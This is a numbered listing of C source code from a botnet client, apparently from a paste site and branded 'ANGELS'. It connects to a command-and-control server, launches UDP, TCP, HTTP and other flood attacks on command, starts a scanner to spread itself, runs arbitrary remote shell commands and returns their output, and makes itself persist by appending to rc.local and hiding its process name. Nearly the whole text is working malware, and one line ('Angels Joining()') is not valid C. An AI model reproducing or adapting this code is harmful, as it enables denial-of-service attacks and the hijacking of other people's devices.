  1976. server.sin_addr.s_addr = inet_addr(ip);
  1977. server.sin_family = AF_INET;
  1978. server.sin_port = htons(port);
  1979.  
  1980. while(end > time(NULL))
  1981. {
  1982. sockfd = socket(AF_INET, SOCK_STREAM, 0);
  1983. connect(sockfd , (struct sockaddr *)&server , sizeof(server));
  1984. sleep(1);
  1985. close(sockfd);
  1986. }
  1987.  
  1988. }
  1989.  
  1990. void processCmd(int argc, unsigned char *argv[])
  1991. {
  1992. int x;
  1993. if(!strcmp(argv[0], "PING"))
  1994. {
  1995. sockprintf(mainCommSock, "PONG!");
  1996. return;
  1997. }
  1998.  
  1999. if(!strcmp(argv[0], "NUP"))
  2000. {
  2001. if(argc > 0){
  2002. char *ip = argv[1];
  2003. ourPublicIP.s_addr = inet_addr(ip);
  2004. sockprintf(mainCommSock, "TEST %s", inet_ntoa(ourIP));
  2005. }
  2006. return;
  2007. }
  2008.  
  2009. if(!strcmp(argv[0], "SPOOF"))
  2010. {
  2011. if(argc > 2){
  2012. char *ip = argv[1];
  2013. int port = argv[2];
  2014. spoofTest(ip,port);
  2015. }
  2016. return;
  2017. }
  2018.  
  2019. if(!strcmp(argv[0], "KILLSUB"))
  2020. {
  2021. if(argc < 1 ){
  2022. sockprintf(mainCommSock, "KILLSUB <sub version to kill>");
  2023. }else{
  2024. int subbbb = atoi(argv[1]);
  2025. if(subbbb == subversionnnn){
  2026. sockprintf(mainCommSock, "KMS!");
  2027. exit(0);
  2028. }else{
  2029. sockprintf(mainCommSock, "not killing myself cuz im not that version");
  2030. }
  2031. }
  2032. }
  2033. if(!strcmp(argv[0], "TABLE"))
  2034. {
  2035. sockprintf(mainCommSock, "%d", getdtablesize());
  2036. return;
  2037. }
  2038. if(!strcmp(argv[0], "SCAN"))
  2039. {
  2040. if(argc < 2)
  2041. {
  2042. sockprintf(mainCommSock, "SCAN <threads> <timeout>");
  2043. return;
  2044. }else{
  2045. int threads = atoi(argv[1]);
  2046. int timeout = atoi(argv[2]);
  2047. if(!listFork())
  2048. {
  2049. sockprintf(mainCommSock, "Starting scanner!!");
  2050. StartTheLelz(timeout, threads);
  2051. _exit(0);
  2052. }
  2053. return;
  2054. }
  2055. }
  2056.  
  2057. if(!strcmp(argv[0], "GETLOCALIP"))
  2058. {
  2059. sockprintf(mainCommSock, "My IP: %s", inet_ntoa(ourIP));
  2060. return;
  2061. }
  2062.  
  2063. if(!strcmp(argv[0], "GETPUBLICIP"))
  2064. {
  2065. sockprintf(mainCommSock, "My Public IP: %s", inet_ntoa(ourPublicIP));
  2066. return;
  2067. }
  2068.  
  2069. if(!strcmp(argv[0], "VERSION"))
  2070. {
  2071. sockprintf(mainCommSock, "Version: %d.%d",versionnnn,subversionnnn);
  2072. return;
  2073. }
  2074.  
  2075. if(!strcmp(argv[0], "RANGE"))
  2076. {
  2077. if(argc < 2 || atoi(argv[1]) == -1){
  2078. sockprintf(mainCommSock, "RANGE <option 0-idk>");
  2079. }else{
  2080. sockprintf(mainCommSock, "Range %d->%d", rangechoice, atoi(argv[1]));
  2081. rangechoice = atoi(argv[1]);
  2082. }
  2083. return;
  2084. }
  2085.  
  2086. if(!strcmp(argv[0], "DOUSPOOFBRAH?")){
  2087. int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
  2088. if(!sockfd)
  2089. {
  2090. return;
  2091. }
  2092.  
  2093. int tmp = 1;
  2094. if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0)
  2095. {
  2096. return;
  2097. }else{
  2098. sockprintf(mainCommSock, "FUK YEA I DO (%s)", inet_ntoa(ourPublicIP));
  2099. }
  2100. }
  2101.  
  2102. if(!strcmp(argv[0], "UDP"))
  2103. {
  2104. // !* UDP TARGET PORT TIME PACKETSIZE POLLINTERVAL
  2105. if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || atoi(argv[4]) == -1 || atoi(argv[4]) > 1024 || (argc == 6 && atoi(argv[5]) < 1))
  2106. {
  2107. return;
  2108. }
  2109. unsigned char *ip = argv[1];
  2110. int port = atoi(argv[2]);
  2111. int time = atoi(argv[3]);
  2112. int packetsize = atoi(argv[4]);
  2113. int pollinterval = (argc == 6 ? atoi(argv[5]) : 10);
  2114. int spoofed = 32;
  2115. if(strstr(ip, ",") != NULL)
  2116. {
  2117. unsigned char *hi = strtok(ip, ",");
  2118. while(hi != NULL)
  2119. {
  2120. if(!listFork())
  2121. {
  2122. SendUDP(hi, port, time, packetsize, pollinterval, spoofed);
  2123. _exit(0);
  2124. }
  2125. hi = strtok(NULL, ",");
  2126. }
  2127. } else {
  2128. if (listFork())
  2129. {
  2130. return;
  2131. }
  2132. SendUDP(ip, port, time, packetsize, pollinterval, spoofed);
  2133. _exit(0);
  2134. }
  2135. }
  2136. if(!strcmp(argv[0], "COMBO"))
  2137. {
  2138. if(argc < 4 || atoi(argv[2]) < 1 || atoi(argv[3]) < 1)
  2139. {
  2140.  
  2141. return;
  2142. }
  2143.  
  2144. unsigned char *ip = argv[1];
  2145. int port = atoi(argv[2]);
  2146. int time = atoi(argv[3]);
  2147.  
  2148. if(strstr(ip, ",") != NULL)
  2149. {
  2150. unsigned char *hi = strtok(ip, ",");
  2151. while(hi != NULL)
  2152. {
  2153. if(!listFork())
  2154. {
  2155. sendJUNK(hi, port, time);
  2156. sendHOLD(hi, port, time);
  2157. close(mainCommSock);
  2158. _exit(0);
  2159. }
  2160. hi = strtok(NULL, ",");
  2161. }
  2162. } else {
  2163. if (listFork()) { return; }
  2164.  
  2165. sendJUNK(ip, port, time);
  2166. sendHOLD(ip, port, time);
  2167. _exit(0);
  2168. }
  2169. }
  2170. if(!strcmp(argv[0], "HOLD"))
  2171. {
  2172. if(argc < 4 || atoi(argv[2]) < 1 || atoi(argv[3]) < 1)
  2173. {
  2174. //sockprintf(mainCommSock, "HOLD <ip> <port> <time>");
  2175. return;
  2176. }
  2177.  
  2178. unsigned char *ip = argv[1];
  2179. int port = atoi(argv[2]);
  2180. int time = atoi(argv[3]);
  2181.  
  2182. if(strstr(ip, ",") != NULL)
  2183. {
  2184. unsigned char *hi = strtok(ip, ",");
  2185. while(hi != NULL)
  2186. {
  2187. if(!listFork())
  2188. {
  2189. sendHOLD(hi, port, time);
  2190. _exit(0);
  2191. }
  2192. hi = strtok(NULL, ",");
  2193. }
  2194. } else {
  2195. if (listFork()) { return; }
  2196.  
  2197. sendHOLD(ip, port, time);
  2198. _exit(0);
  2199. }
  2200. }
  2201. if(!strcmp(argv[0], "JUNK"))
  2202. {
  2203. if(argc < 4 || atoi(argv[2]) < 1 || atoi(argv[3]) < 1)
  2204. {
  2205. //sockprintf(mainCommSock, "JUNK <ip> <port> <time>");
  2206. return;
  2207. }
  2208.  
  2209. unsigned char *ip = argv[1];
  2210. int port = atoi(argv[2]);
  2211. int time = atoi(argv[3]);
  2212.  
  2213. if(strstr(ip, ",") != NULL)
  2214. {
  2215. unsigned char *hi = strtok(ip, ",");
  2216. while(hi != NULL)
  2217. {
  2218. if(!listFork())
  2219. {
  2220. sendJUNK(hi, port, time);
  2221. close(mainCommSock);
  2222. _exit(0);
  2223. }
  2224. hi = strtok(NULL, ",");
  2225. }
  2226. } else {
  2227. if (listFork()) { return; }
  2228.  
  2229. sendJUNK(ip, port, time);
  2230. _exit(0);
  2231. }
  2232. }
  2233. if(!strcmp(argv[0], "TCP"))
  2234. {
  2235. //!* TCP TARGET PORT TIME FLAGS PACKETSIZE POLLINTERVAL
  2236. if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || (argc > 5 && atoi(argv[5]) < 0) || (argc == 7 && atoi(argv[6]) < 1))
  2237. {
  2238. return;
  2239. }
  2240. unsigned char *ip = argv[1];
  2241. int port = atoi(argv[2]);
  2242. int time = atoi(argv[3]);
  2243. unsigned char *flags = argv[4];
  2244. int pollinterval = argc == 7 ? atoi(argv[6]) : 10;
  2245. int packetsize = argc > 5 ? atoi(argv[5]) : 0;
  2246. int spoofed = 32;
  2247. if(strstr(ip, ",") != NULL) {
  2248. unsigned char *hi = strtok(ip, ",");
  2249. while(hi != NULL) {
  2250. if(!listFork()) {
  2251. SendTCP(hi, port, time, flags, packetsize, pollinterval, spoofed);
  2252. _exit(0);
  2253. }
  2254. hi = strtok(NULL, ",");
  2255. }
  2256. } else {
  2257. if (listFork())
  2258. {
  2259. return;
  2260. }
  2261. SendTCP(ip, port, time, flags, packetsize, pollinterval, spoofed);
  2262. _exit(0);
  2263. }
  2264. }
  2265. if(!strcmp(argv[0], "L7"))
  2266. {
  2267. if(argc < 4 || atoi(argv[2]) < 1 || atoi(argv[3]) < 1)
  2268. {
  2269. sockprintf(mainCommSock, "L7 <protocol ip url> <time> <threads> <sleep check> <sleep time(ms)>");
  2270. return;
  2271. }
  2272.  
  2273. unsigned char *ip = argv[1];
  2274. int time = atoi(argv[2]);
  2275. int threads = atoi(argv[3]);
  2276. int sleepcheck = (argc > 4 ? atoi(argv[4]) : 1000000);
  2277. int sleeptime = (argc > 5 ? atoi(argv[5]) : 0);
  2278. system("mkdir /tmp/yuagwduiagwdhg");
  2279.  
  2280. if(strstr(ip, ",") != NULL)
  2281. {
  2282. unsigned char *hi = strtok(ip, ",");
  2283. while(hi != NULL)
  2284. {
  2285. int i = 0;
  2286. while(i < threads){
  2287. if(!listFork())
  2288. {
  2289. sendHTTP(hi, time, sleepcheck, sleeptime);
  2290. close(mainCommSock);
  2291. _exit(0);
  2292. }
  2293. i++;
  2294. }
  2295. hi = strtok(NULL, ",");
  2296. }
  2297. } else{
  2298. int i = 0;
  2299. while(i < threads){
  2300. if(!listFork()){
  2301. sendHTTP(ip, time, sleepcheck, sleeptime);
  2302. close(mainCommSock);
  2303. _exit(0);
  2304. }
  2305. i++;
  2306. }
  2307. }
  2308. }
  2309.  
  2310. if(!strcmp(argv[0], "L420"))
  2311. {
  2312. if(argc < 4 || atoi(argv[2]) < 1 || atoi(argv[3]) < 1)
  2313. {
  2314. sockprintf(mainCommSock, "L7 <protocol ip url> <time> <threads> <sleep check> <sleep time(ms)>");
  2315. return;
  2316. }
  2317.  
  2318. unsigned char *ip = argv[1];
  2319. int time = atoi(argv[2]);
  2320. int threads = atoi(argv[3]);
  2321. int sleepcheck = (argc > 4 ? atoi(argv[4]) : 1000000);
  2322. int sleeptime = (argc > 5 ? atoi(argv[5]) : 0);
  2323. system("mkdir /tmp/yuagwduiagwdhg");
  2324.  
  2325. if(strstr(ip, ",") != NULL)
  2326. {
  2327. unsigned char *hi = strtok(ip, ",");
  2328. while(hi != NULL)
  2329. {
  2330. int i = 0;
  2331. while(i < threads){
  2332. if(!listFork())
  2333. {
  2334. sendHTTP2(hi, time, sleepcheck, sleeptime);
  2335. close(mainCommSock);
  2336. sleep(10);
  2337. system("rm -fr /tmp/yuagwduiagwdhg");
  2338. _exit(0);
  2339. }
  2340. i++;
  2341. }
  2342. hi = strtok(NULL, ",");
  2343. }
  2344. } else{
  2345. int i = 0;
  2346. while(i < threads){
  2347. if(!listFork()){
  2348. sendHTTP2(ip, time, sleepcheck, sleeptime);
  2349. close(mainCommSock);
  2350. sleep(10);
  2351. system("rm -fr /tmp/yuagwduiagwdhg");
  2352. _exit(0);
  2353. }
  2354. i++;
  2355. }
  2356. }
  2357. }
  2358.  
  2359. if(!strcmp(argv[0], "VIEWPAGE"))
  2360. {
  2361. if(argc < 2){
  2362. sockprintf(mainCommSock, "VIEWPAGE <http ip url>");
  2363. return;
  2364. }else{
  2365. char *url = argv[1];
  2366. char *UA = useragents[rand() % (sizeof(useragents)/sizeof(char *))];
  2367. system("mkdir /tmp/yuagwduiagwdhg");
  2368. char *command[80];
  2369. sprintf(command,"wget -O /tmp/yuagwduiagwdhg/a -U \"");
  2370. strcat(command, UA);
  2371. strcat(command,"\" -q ");
  2372. strcat(command, url);
  2373. system(command);
  2374. system("rm -fr /tmp/yuagwduiagwdhg");
  2375. }
  2376. }
  2377.  
  2378. if(!strcmp(argv[0], "CNC"))
  2379. {
  2380. if(argc < 4 || atoi(argv[2]) < 1 || atoi(argv[3]) < 1)
  2381. {
  2382. sockprintf(mainCommSock, "CNC <target> <port> <time>");
  2383. return;
  2384. }
  2385.  
  2386. unsigned char *ip = argv[1];
  2387. int port = atoi(argv[2]);
  2388. int time = atoi(argv[3]);
  2389.  
  2390. if(strstr(ip, ",") != NULL)
  2391. {
  2392. unsigned char *hi = strtok(ip, ",");
  2393. while(hi != NULL)
  2394. {
  2395. if(!listFork())
  2396. {
  2397. sendCNC(hi, port, time);
  2398. close(mainCommSock);
  2399. _exit(0);
  2400. }
  2401. hi = strtok(NULL, ",");
  2402. }
  2403. } else {
  2404. if (listFork()) { return; }
  2405.  
  2406. sendCNC(ip, port, time);
  2407. _exit(0);
  2408. }
  2409. }
  2410.  
  2411. if(!strcmp(argv[0], "STD"))
  2412. {
  2413. //!* STD TARGET PORT TIME
  2414. if(argc < 4 || atoi(argv[2]) < 1 || atoi(argv[3]) < 1)
  2415. {
  2416. return;
  2417. }
  2418. unsigned char *ip = argv[1];
  2419. int port = atoi(argv[2]);
  2420. int time = atoi(argv[3]);
  2421. if(strstr(ip, ",") != NULL)
  2422. {
  2423. unsigned char *hi = strtok(ip, ",");
  2424. while(hi != NULL)
  2425. {
  2426. if(!listFork())
  2427. {
  2428. SendSTD(hi, port, time);
  2429. _exit(0);
  2430. }
  2431. hi = strtok(NULL, ",");
  2432. }
  2433. } else {
  2434. if (listFork())
  2435. {
  2436. return;
  2437. }
  2438. SendSTD(ip, port, time);
  2439. _exit(0);
  2440. }
  2441. }
  2442. if(!strcmp(argv[0], "KILLATTK"))
  2443. {
  2444. int killed = 0;
  2445. unsigned long i;
  2446. for (i = 0; i < numpids; i++) {
  2447. if (pids[i] != 0 && pids[i] != getpid()) {
  2448. kill(pids[i], 9);
  2449. killed++;
  2450. }
  2451. }
  2452.  
  2453. if(killed > 0)
  2454. {
  2455. sockprintf(mainCommSock, "Killed %d.", killed);
  2456. } else {
  2457. sockprintf(mainCommSock, "None Killed.");
  2458. }
  2459. }
  2460.  
  2461. if(!strcmp(argv[0], "LOLNOGTFO"))
  2462. {
  2463. exit(0);
  2464. }
  2465. }
  2466.  
  2467. int initConnection()
  2468. {
  2469. unsigned char server[4096];
  2470. memset(server, 0, 4096);
  2471. if(mainCommSock) { close(mainCommSock); mainCommSock = 0; }
  2472. if(currentServer + 1 == SERVER_LIST_SIZE) currentServer = 0;
  2473. else currentServer++;
  2474.  
  2475. strcpy(server, commServer[currentServer]);
  2476. int port = 443;
  2477. if(strchr(server, ':') != NULL)
  2478. {
  2479. port = atoi(strchr(server, ':') + 1);
  2480. *((unsigned char *)(strchr(server, ':'))) = 0x0;
  2481. }
  2482.  
  2483. mainCommSock = socket(AF_INET, SOCK_STREAM, 0);
  2484.  
  2485. if(!connectTimeout(mainCommSock, server, port, 30)) return 1;
  2486.  
  2487. return 0;
  2488. }
  2489.  
  2490. int getOurIP()
  2491. {
  2492. int sock = socket(AF_INET, SOCK_DGRAM, 0);
  2493. if(sock == -1) return 0;
  2494.  
  2495. struct sockaddr_in serv;
  2496. memset(&serv, 0, sizeof(serv));
  2497. serv.sin_family = AF_INET;
  2498. serv.sin_addr.s_addr = inet_addr("8.8.8.8");
  2499. serv.sin_port = htons(443);
  2500.  
  2501. int err = connect(sock, (const struct sockaddr*) &serv, sizeof(serv));
  2502. if(err == -1) return 0;
  2503.  
  2504. struct sockaddr_in name;
  2505. socklen_t namelen = sizeof(name);
  2506. err = getsockname(sock, (struct sockaddr*) &name, &namelen);
  2507. if(err == -1) return 0;
  2508.  
  2509. ourIP.s_addr = name.sin_addr.s_addr;
  2510.  
  2511. int cmdline = open("/proc/net/route", O_RDONLY);
  2512. char linebuf[4096];
  2513. while(fdgets(linebuf, 4096, cmdline) != NULL)
  2514. {
  2515. if(strstr(linebuf, "\t00000000\t") != NULL)
  2516. {
  2517. unsigned char *pos = linebuf;
  2518. while(*pos != '\t') pos++;
  2519. *pos = 0;
  2520. break;
  2521. }
  2522. memset(linebuf, 0, 4096);
  2523. }
  2524. close(cmdline);
  2525.  
  2526. if(*linebuf)
  2527. {
  2528. int i;
  2529. struct ifreq ifr;
  2530. strcpy(ifr.ifr_name, linebuf);
  2531. ioctl(sock, SIOCGIFHWADDR, &ifr);
  2532. for (i=0; i<6; i++) macAddress[i] = ((unsigned char*)ifr.ifr_hwaddr.sa_data)[i];
  2533. }
  2534.  
  2535. close(sock);
  2536. }
  2537.  
  2538. char *getBuild()
  2539. {
  2540. #ifdef MIPS_BUILD
  2541. return "FLUBBER";
  2542. #elif MIPSEL_BUILD
  2543. return "HEADASS";
  2544. #elif X86_BUILD
  2545. return "CUCK";
  2546. #elif ARM_BUILD
  2547. return "ARMYS";
  2548. #elif PPC_BUILD
  2549. return "SKIDS";
  2550. #else
  2551. return "REKTS";
  2552. #endif
  2553. }
  2554.  
  2555. int main(int argc, unsigned char *argv[])
  2556. {
  2557. char *mynameis = "";
  2558. if(SERVER_LIST_SIZE <= 0) return 0;
  2559. printf("ANGELS %s\n", getBuild());
  2560. strncpy(argv[0],"",strlen(argv[0]));
  2561. argv[0] = "";
  2562. prctl(PR_SET_NAME, (unsigned long) mynameis, 0, 0, 0);
  2563. srand(time(NULL) ^ getpid());
  2564. init_rand(time(NULL) ^ getpid());
  2565. pid_t pid1;
  2566. pid_t pid2;
  2567. int status;
  2568. int dupthing = 0;
  2569.  
  2570. char cwd[256],*str;
  2571. FILE *file;
  2572. str="/etc/rc.d/rc.local";
  2573. file=fopen(str,"r");
  2574. if (file == NULL) {
  2575. str="/etc/rc.conf";
  2576. file=fopen(str,"r");
  2577. }
  2578. if (file != NULL) {
  2579. char outfile[256], buf[1024];
  2580. int i=strlen(argv[0]), d=0;
  2581. getcwd(cwd,256);
  2582. if (strcmp(cwd,"/")) {
  2583. while(argv[0][i] != '/') i--;
  2584. sprintf(outfile,"\"%s%s\"\n",cwd,argv[0]+i);
  2585. while(!feof(file)) {
  2586. fgets(buf,1024,file);
  2587. if (!strcasecmp(buf,outfile)) d++;
  2588. }
  2589. if (d == 0) {
  2590. FILE *out;
  2591. fclose(file);
  2592. out=fopen(str,"a");
  2593. if (out != NULL) {
  2594. fputs(outfile,out);
  2595. fclose(out);
  2596. }
  2597. }
  2598. else fclose(file);
  2599. }
  2600. else fclose(file);
  2601. }
  2602.  
  2603. getOurIP();
  2604.  
  2605. if (pid1 = fork()) {
  2606. waitpid(pid1, &status, 0);
  2607. exit(0);
  2608. } else if (!pid1) {
  2609. if (pid2 = fork()) {
  2610. exit(0);
  2611. } else if (!pid2) {
  2612. } else {
  2613. zprintf("fork failed\n");
  2614. }
  2615. } else {
  2616. zprintf("fork failed\n");
  2617. }
  2618.  
  2619. setsid();
  2620. chdir("/");
  2621.  
  2622. signal(SIGPIPE, SIG_IGN);
  2623.  
  2624. while(1)
  2625. {
  2626. if(initConnection()) { sleep(30); continue; }
  2627.  
  2628. sockprintf(mainCommSock, "FLYING %s", Angels Joining());
  2629.  
  2630. char commBuf[4096];
  2631. int got = 0;
  2632. int i = 0;
  2633. while((got = recvLine(mainCommSock, commBuf, 4096)) != -1)
  2634. {
  2635. for (i = 0; i < numpids; i++) if (waitpid(pids[i], NULL, WNOHANG) > 0) {
  2636. unsigned int *newpids, on;
  2637. for (on = i + 1; on < numpids; on++) pids[on-1] = pids[on];
  2638. pids[on - 1] = 0;
  2639. numpids--;
  2640. newpids = (unsigned int*)malloc((numpids + 1) * sizeof(unsigned int));
  2641. for (on = 0; on < numpids; on++) newpids[on] = pids[on];
  2642. free(pids);
  2643. pids = newpids;
  2644. }
  2645.  
  2646. commBuf[got] = 0x00;
  2647.  
  2648. trim(commBuf);
  2649.  
  2650. if(strstr(commBuf, "PING") == commBuf)
  2651. {
  2652. sockprintf(mainCommSock, "PONG");
  2653. continue;
  2654. }
  2655. if(strstr(commBuf, "DUP") == commBuf){
  2656. dupthing++;
  2657. zprintf("aparently im a dupe\n");
  2658. if(dupthing > 20){
  2659. exit(0);
  2660. }
  2661. break;
  2662. }
  2663.  
  2664. unsigned char *message = commBuf;
  2665.  
  2666. if(*message == '!')
  2667. {
  2668. unsigned char *nickMask = message + 1;
  2669. while(*nickMask != ' ' && *nickMask != 0x00) nickMask++;
  2670. if(*nickMask == 0x00) continue;
  2671. *(nickMask) = 0x00;
  2672. nickMask = message + 1;
  2673.  
  2674. message = message + strlen(nickMask) + 2;
  2675. while(message[strlen(message) - 1] == '\n' || message[strlen(message) - 1] == '\r') message[strlen(message) - 1] = 0x00;
  2676.  
  2677. unsigned char *command = message;
  2678. while(*message != ' ' && *message != 0x00) message++;
  2679. *message = 0x00;
  2680. message++;
  2681.  
  2682. unsigned char *tmpcommand = command;
  2683. while(*tmpcommand) { *tmpcommand = toupper(*tmpcommand); tmpcommand++; }
  2684.  
  2685. if(strcmp(command, "SH") == 0)
  2686. {
  2687. unsigned char buf[1024];
  2688. int command;
  2689. if (listFork()) continue;
  2690. memset(buf, 0, 1024);
  2691. szprintf(buf, "%s 2>&1", message);
  2692. command = fdpopen(buf, "r");
  2693. while(fdgets(buf, 1024, command) != NULL)
  2694. {
  2695. trim(buf);
  2696. sockprintf(mainCommSock, "%s", buf);
  2697. memset(buf, 0, 1024);
  2698. sleep(1);
  2699. }
  2700. fdpclose(command);
  2701. exit(0);
  2702. }
  2703.  
  2704. unsigned char *params[10];
  2705. int paramsCount = 1;
  2706. unsigned char *pch = strtok(message, " ");
  2707. params[0] = command;
  2708.  
  2709. while(pch)
  2710. {
  2711. if(*pch != '\n')
  2712. {
  2713. params[paramsCount] = (unsigned char *)malloc(strlen(pch) + 1);
  2714. memset(params[paramsCount], 0, strlen(pch) + 1);
  2715. strcpy(params[paramsCount], pch);
  2716. paramsCount++;
  2717. }
  2718. pch = strtok(NULL, " ");
  2719. }
  2720.  
  2721. processCmd(paramsCount, params);
  2722.  
  2723. if(paramsCount > 1)
  2724. {
  2725. int q = 1;
  2726. for(q = 1; q < paramsCount; q++)
  2727. {
  2728. free(params[q]);
  2729. }
  2730. }
  2731. }
  2732. }
  2733. sleep(30);
  2734. }
  2735.  
  2736. return 0;
  2737. printf("client exiting");
  2738. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement